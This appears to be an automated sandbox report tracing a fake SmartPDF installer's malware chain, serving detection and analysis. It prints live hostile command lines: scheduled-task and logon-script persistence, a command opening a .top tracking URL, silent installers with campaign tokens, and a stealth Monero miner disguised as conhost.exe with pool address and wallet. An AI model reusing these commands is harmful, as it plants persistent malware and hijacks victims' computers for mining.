MicrosoftEdge.exeSetup.exeMicrosoftEdgeCP.exePublicDwlBrowser144.exe5531728.exe6279164.exeSetup.exeWerFault.exeWerFault.exeServices.execonhost.exeRegAsm.exetaskkill.exewrap 1.exerundll32.exesvchost.exemsiexec.exeinstaller.exedescription pid process Token: SeDebugPrivilege 3768 MicrosoftEdge.exe Token: SeDebugPrivilege 3768 MicrosoftEdge.exe Token: SeDebugPrivilege 3768 MicrosoftEdge.exe Token: SeDebugPrivilege 3768 MicrosoftEdge.exe Token: SeDebugPrivilege 4244 Setup.exe Token: SeDebugPrivilege 3816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1312 PublicDwlBrowser144.exe Token: SeDebugPrivilege 2356 5531728.exe Token: SeDebugPrivilege 4904 6279164.exe Token: SeDebugPrivilege 1300 Setup.exe Token: SeDebugPrivilege 692 WerFault.exe Token: SeRestorePrivilege 4144 WerFault.exe Token: SeBackupPrivilege 4144 WerFault.exe Token: SeBackupPrivilege 4144 WerFault.exe Token: SeDebugPrivilege 4144 WerFault.exe Token: SeDebugPrivilege 1820 Services.exe Token: SeLockMemoryPrivilege 4580 conhost.exe Token: SeLockMemoryPrivilege 4580 conhost.exe Token: SeDebugPrivilege 4308 RegAsm.exe Token: SeDebugPrivilege 4440 taskkill.exe Token: SeDebugPrivilege 1528 wrap 1.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 4380 svchost.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeDebugPrivilege 3640 rundll32.exe Token: SeSecurityPrivilege 4988 msiexec.exe Token: SeCreateTokenPrivilege 3512 installer.exe Token: SeAssignPrimaryTokenPrivilege 3512 installer.exe Token: SeLockMemoryPrivilege 3512 installer.exe Token: SeIncreaseQuotaPrivilege 3512 installer.exe Token: SeMachineAccountPrivilege 3512 installer.exe Token: SeTcbPrivilege 3512 installer.exe Token: SeSecurityPrivilege 3512 installer.exe Token: SeTakeOwnershipPrivilege 3512 installer.exe Token: SeLoadDriverPrivilege 3512 installer.exe Token: SeSystemProfilePrivilege 3512 installer.exe Token: SeSystemtimePrivilege 3512 installer.exe Token: SeProfSingleProcessPrivilege 3512 installer.exe Token: SeIncBasePriorityPrivilege 3512 installer.exe Token: SeCreatePagefilePrivilege 3512 installer.exe Token: SeCreatePermanentPrivilege 3512 installer.exe Token: SeBackupPrivilege 3512 installer.exe Token: SeRestorePrivilege 3512 installer.exe Token: SeShutdownPrivilege 3512 installer.exe Token: SeDebugPrivilege 3512 installer.exe Token: SeAuditPrivilege 3512 installer.exe Token: SeSystemEnvironmentPrivilege 3512 installer.exe Token: SeChangeNotifyPrivilege 3512 installer.exe Token: SeRemoteShutdownPrivilege 3512 installer.exe Token: SeUndockPrivilege 3512 installer.exe Token: SeSyncAgentPrivilege 3512 installer.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Fri195cd4dbfdf37897.tmpConhost.exeinstaller.exeIBInstaller_74449.tmpsvrwebui.exepid process 4852 Fri195cd4dbfdf37897.tmp 2176 Conhost.exe 3512 installer.exe 4312 IBInstaller_74449.tmp 4212 svrwebui.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 3768 MicrosoftEdge.exe 1588 MicrosoftEdgeCP.exe 1588 MicrosoftEdgeCP.exe 2716 MicrosoftEdge.exe 3656 MicrosoftEdgeCP.exe 3656 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.tmpSetup.exestats.exeConhost.exeSetup.exePublicDwlBrowser144.exe4260399.exeMortician.execmd.exeSetup.execmd.execmd.exeImpedire.exe.comImpedire.exe.comdescription pid process target process PID 4824 wrote to memory of 4852 4824 Fri195cd4dbfdf37897.exe Fri195cd4dbfdf37897.tmp PID 4824 wrote to memory of 4852 4824 Fri195cd4dbfdf37897.exe Fri195cd4dbfdf37897.tmp PID 4824 wrote to memory of 4852 4824 Fri195cd4dbfdf37897.exe Fri195cd4dbfdf37897.tmp PID 4852 wrote to memory of 5036 4852 Fri195cd4dbfdf37897.tmp Setup.exe PID 4852 wrote to memory of 5036 4852 Fri195cd4dbfdf37897.tmp Setup.exe PID 4852 wrote to memory of 5036 4852 Fri195cd4dbfdf37897.tmp Setup.exe PID 5036 wrote to memory of 4244 5036 Setup.exe Setup.exe PID 5036 wrote to memory of 4244 5036 Setup.exe Setup.exe PID 5036 wrote to memory of 4028 5036 Setup.exe stats.exe PID 5036 wrote to memory of 4028 5036 Setup.exe stats.exe PID 5036 wrote to memory of 4028 5036 Setup.exe stats.exe PID 4028 wrote to memory of 2176 4028 stats.exe Conhost.exe PID 4028 wrote to memory of 2176 4028 stats.exe Conhost.exe PID 4028 wrote to memory of 2176 4028 stats.exe Conhost.exe PID 2176 wrote to memory of 1300 2176 Conhost.exe Setup.exe PID 2176 wrote to memory of 1300 2176 Conhost.exe Setup.exe PID 4244 wrote to memory of 1312 4244 Setup.exe PublicDwlBrowser144.exe PID 4244 wrote to memory of 1312 4244 Setup.exe PublicDwlBrowser144.exe PID 1312 wrote to memory of 2356 1312 PublicDwlBrowser144.exe 5531728.exe PID 1312 wrote to memory of 2356 1312 PublicDwlBrowser144.exe 5531728.exe PID 1312 wrote to memory of 2636 1312 PublicDwlBrowser144.exe 4260399.exe PID 1312 wrote to memory of 2636 1312 PublicDwlBrowser144.exe 4260399.exe PID 1312 wrote to memory of 2636 1312 PublicDwlBrowser144.exe 4260399.exe PID 1312 wrote to memory of 4904 1312 PublicDwlBrowser144.exe 6279164.exe PID 1312 wrote to memory of 4904 1312 PublicDwlBrowser144.exe 6279164.exe PID 1312 wrote to memory of 4904 1312 PublicDwlBrowser144.exe 6279164.exe PID 2636 wrote to memory of 4924 2636 4260399.exe WinHoster.exe PID 2636 wrote to memory of 4924 2636 4260399.exe WinHoster.exe PID 2636 wrote to memory of 4924 2636 4260399.exe WinHoster.exe PID 4244 wrote to memory of 4540 4244 Setup.exe Mortician.exe PID 4244 wrote to memory of 4540 4244 Setup.exe Mortician.exe PID 4244 wrote to memory of 4540 4244 Setup.exe Mortician.exe PID 4540 wrote to memory of 4556 4540 Mortician.exe cmd.exe PID 4540 wrote to memory of 4556 4540 Mortician.exe cmd.exe PID 4540 wrote to memory of 4556 4540 Mortician.exe cmd.exe PID 4556 wrote to memory of 588 4556 cmd.exe cmd.exe PID 4556 wrote to memory of 588 4556 cmd.exe cmd.exe PID 4556 wrote to memory of 588 4556 cmd.exe cmd.exe PID 1300 wrote to memory of 4432 1300 Setup.exe cmd.exe PID 1300 wrote to memory of 4432 1300 Setup.exe cmd.exe PID 4432 wrote to memory of 1764 4432 cmd.exe schtasks.exe PID 4432 wrote to memory of 1764 4432 cmd.exe schtasks.exe PID 588 wrote to memory of 1304 588 cmd.exe findstr.exe PID 588 wrote to memory of 1304 588 cmd.exe findstr.exe PID 588 wrote to memory of 1304 588 cmd.exe findstr.exe PID 588 wrote to memory of 2632 588 cmd.exe Impedire.exe.com PID 588 wrote to memory of 2632 588 cmd.exe Impedire.exe.com PID 588 wrote to memory of 2632 588 cmd.exe Impedire.exe.com PID 588 wrote to memory of 4608 588 cmd.exe PING.EXE PID 588 wrote to memory of 4608 588 cmd.exe PING.EXE PID 588 wrote to memory of 4608 588 cmd.exe PING.EXE PID 2632 wrote to memory of 720 2632 Impedire.exe.com Impedire.exe.com PID 2632 wrote to memory of 720 2632 Impedire.exe.com Impedire.exe.com PID 2632 wrote to memory of 720 2632 Impedire.exe.com Impedire.exe.com PID 720 wrote to memory of 3556 720 Impedire.exe.com Impedire.exe.com PID 720 wrote to memory of 3556 720 Impedire.exe.com Impedire.exe.com PID 720 wrote to memory of 3556 720 Impedire.exe.com Impedire.exe.com PID 4244 wrote to memory of 1088 4244 Setup.exe foradvertising.exe PID 4244 wrote to memory of 1088 4244 Setup.exe foradvertising.exe PID 4244 wrote to memory of 1088 4244 Setup.exe foradvertising.exe PID 1300 wrote to memory of 3700 1300 Setup.exe sihost64.exe PID 1300 wrote to memory of 3700 1300 Setup.exe sihost64.exe PID 1300 wrote to memory of 1820 1300 Setup.exe Services.exe PID 1300 wrote to memory of 1820 1300 Setup.exe Services.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe"C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-TOU3P.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-TOU3P.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$30052,138429,56832,C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\5531728.exe"C:\ProgramData\5531728.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2356 -s 20807⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4260399.exe"C:\ProgramData\4260399.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\6279164.exe"C:\ProgramData\6279164.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 18767⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx8⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\RegAsm.exeC:\Users\Admin\AppData\Roaming\RegAsm.exe11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\PING.EXEping localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631050103 /qn CAMPAIGN=""710"" " CAMPAIGN="710"6⤵
-
C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-63G8M.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-63G8M.tmp\IBInstaller_74449.tmp" /SL5="$15027E,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7216⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\microsoft.cab -F:* %ProgramData%7⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\microsoft.cab -F:* C:\ProgramData8⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f8⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7217⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\vdi_compiler"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-QEVD1.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-QEVD1.tmp\stats.tmp" /SL5="$20258,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe" /Verysilent6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6CC96B0D1A4C848A087192173BD29C9C C2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1EC2C88562E3EC5345B78A05C155DC02⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1FDC236C444A6F458D90AF153C13CEC6 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exeMD5
c53dfdfaef23d5e21c54b9da042151bb
SHA1c68e6028f6109059417baaae012a73b2a255673d
SHA2569306e1ca910cf51c0638265904c5d1b8edd06548887fc10a37e0ac561a53d8e9
SHA512bb64a838bf0a68a9ab7abedb075bf55b5968d6944c11f3426c21b694987fcb313de31dff74b47b09a0c675fda993d61d4a28ce4be72e66cc69de6c704cac2597
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exeMD5
c53dfdfaef23d5e21c54b9da042151bb
SHA1c68e6028f6109059417baaae012a73b2a255673d
SHA2569306e1ca910cf51c0638265904c5d1b8edd06548887fc10a37e0ac561a53d8e9
SHA512bb64a838bf0a68a9ab7abedb075bf55b5968d6944c11f3426c21b694987fcb313de31dff74b47b09a0c675fda993d61d4a28ce4be72e66cc69de6c704cac2597
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exeMD5
30e6e113a8bb5b3ef4503fe49a475ce8
SHA12b07fa4efe4df32492d99da54f4db62f77a5d20c
SHA25670b67715a10d7e76fe36ce61e6257665974eef74cd0e26d42c30983f2c49802d
SHA512ee71207c1e7f204f91bf5edaa966ff7de61fde2714f133c7d5fb95801c031f934a364c1d193ed02261e3bff2eee3feeb68ba3ce52b8563c6eac2969d7ec9bcac
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exeMD5
30e6e113a8bb5b3ef4503fe49a475ce8
SHA12b07fa4efe4df32492d99da54f4db62f77a5d20c
SHA25670b67715a10d7e76fe36ce61e6257665974eef74cd0e26d42c30983f2c49802d
SHA512ee71207c1e7f204f91bf5edaa966ff7de61fde2714f133c7d5fb95801c031f934a364c1d193ed02261e3bff2eee3feeb68ba3ce52b8563c6eac2969d7ec9bcac
-
C:\ProgramData\4260399.exeMD5
b9295c5e9138ccf15d67771f3726c778
SHA140cd9d94e9913a52877f09f340a5c2604030409c
SHA2568c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292
SHA5124e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08
-
C:\ProgramData\4260399.exeMD5
b9295c5e9138ccf15d67771f3726c778
SHA140cd9d94e9913a52877f09f340a5c2604030409c
SHA2568c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292
SHA5124e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08
-
C:\ProgramData\5531728.exeMD5
93fcdbad1d4afe23c38c68598fdf75a5
